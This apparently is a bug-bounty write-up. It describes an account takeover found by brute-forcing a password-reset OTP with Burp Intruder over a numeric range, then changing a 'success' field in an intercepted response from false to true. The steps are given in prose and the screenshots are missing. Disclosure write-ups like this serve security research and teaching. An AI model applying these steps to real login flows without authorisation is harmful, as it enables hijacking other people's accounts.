OTP Bruteforce Chained with Response Manipulation Leads to Zero Click Account Takeover

Hey there! It’s cyberpro151 back with another PoC writeup for y’all.

In today’s article, I’ll be sharing about an account takeover on a target which I found by chaining OTP bruteforce along with response manipulation so let’s get started.

So while testing that target, I was testing my favourite functionality which was password reset functionality and the normal flow of this functionality was that for resetting your password, you first need to visit, https://redacted.com/forgot-password , then there will be an email field where you have to type your email and click on the button labelled “SEND VERIFICATION CODE”, a code will be sent to your email. You’ll enter the code and bingo! You’ll be redirected to the page where you can enter your new password and reset the password. Hmmm! Seems interesting.

I quickly thought about testing the functionality so I again visited to https://redacted.com/forgot-password and entered my email which for the sake of demonstration, I will say victim@gmail.com throughout this article.

After entering my email “victim@gmail.com”, I clicked on “SEND VERIFICATION CODE” due to which an email was sent on my account which looked something like following:

I entered the wrong code and thought about bruteforcing the OTP so for that purpose, the code that I entered was 133770 because I thought about bruteforcing 100 times.

After entering the code, I simply clicked on “Verify Code” button and captured the request. The request looked something like following:

I simply sent this request to “Intruder” and under “Positions” section, I clicked on “Clear” button on right side and then after selecting the value of code parameter “133770”, I clicked on “Add” button on the right side. Then I clicked on “Payloads” tab and under “Payloads type” option, I clicked on “Numbers” option. Now within the options of “Payload settings”, in front of a field labelled “From” , I typed 133770 and in front of a field labelled “To”, I typed 133870. Similarly, in front of field labelled “Step”, I typed 1 and then clicked on “Start attack” button present on the top right corner.

Now the thing that I noticed was that 99 requests had a length of 989 but that one request with the valid verification code had a length of 988 as it can be seen in the picture below:

Now when I looked at the response of the last request with valid code, it looked something like following:

Sweet! the value of success parameter as “true” depicted that everything is going great so far.

Now I simply navigated to the Proxy tab where my initial request with invalid code was present and after right clicking on the request, I hovered on option “Do intercept” and clicked on “Response to this request” and after that, I forwarded the request. The response looked like following:

I simply changed the value of success parameter from false to true and forwarded the response and Bingo! I was displayed with the page where I can enter my new password.

I quickly typed new password and saved it and Bingo! A successful account takeover found. Now I reported this vulnerability and within a few days, it was accepted with as a P2.

Tip: First try to understand the flow of a specific functionality and then start testing it.